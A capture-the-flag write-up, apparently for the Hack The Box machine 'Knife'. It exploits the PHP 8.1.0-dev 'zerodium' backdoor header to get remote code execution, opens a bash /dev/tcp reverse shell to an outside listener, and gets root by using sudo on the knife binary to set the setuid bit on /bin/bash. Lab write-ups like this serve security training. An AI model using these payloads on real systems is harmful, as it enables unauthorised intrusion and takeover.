🟢Knife

OS: Linux; - Difficulty: Easy

Port scan

PORT   STATE SERVICE 
22/tcp open  ssh 
80/tcp open  http

website

looking at the site we don't see anything interesting.

I tried fuzzing around to find more information but found nothing.

so I decided to look at the requests.

request:

GET /index.php HTTP/1.1
Host: 10.129.109.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

response

HTTP/1.1 200 OK
Date: Sat, 22 May 2021 21:45:40 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Vary: Accept-Encoding
Content-Length: 5815
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" >
[...]

here we have something interesting: the server is running PHP 8.1.0-dev.

X-Powered-By: PHP/8.1.0-dev

searching about PHP 8.1.0-dev vulnerabilities

https://www.h3c.com/cn/d_202104/1397014_30003_0.htm

After translating this site we see that in this specific version of php a backdoor was placed (this backdoor was quickly removed in the updates)

searching more about the backdoor I found this:

https://blog.csdn.net/zy15667076526/article/details/116447864

this article teaches us how to use this backdoor to execute code and have an RCE

by adding the header "User-Agentt: zerodium" we can execute php code.

so our request will be:

GET /index.php HTTP/1.1
Host: 10.129.109.116
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
User-Agentt: zerodiumsystem('id');

and we got the response:

HTTP/1.1 200 OK
Date: Sat, 22 May 2021 23:43:40 GMT
Server: Apache/2.4.41 (Ubuntu)
X-Powered-By: PHP/8.1.0-dev
Vary: Accept-Encoding
Content-Length: 5866
Connection: close
Content-Type: text/html; charset=UTF-8

uid=1000(james) gid=1000(james) groups=1000(james)
<!DOCTYPE html>
[...]

worked, we got Remote Code execution

User

open a listener

nc -lvnp 1234

use this header

User-Agentt: zerodiumsystem('bash -c "/bin/sh -i >& /dev/tcp/10.10.14.96/1234 0>&1" ');

got shell

improving this shell to a tty

python3 -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo; fg
export TERM=xterm
clear

Privilege Escalation

sudo -l

check this binary

cat /usr/bin/knife

looks like a management program written in ruby

running this binary

/usr/bin/knife

we see that we can run commands

I wrote a script that runs a command to make bash runnable as root without a password

echo '`chmod +s /bin/bash`' > rootscript

sudo /usr/bin/knife exec rootscript

now run bash with -p flag

bash -p

we got root, just get the root flag

PreviousCap NextThe Notebook

Last updated 4 years ago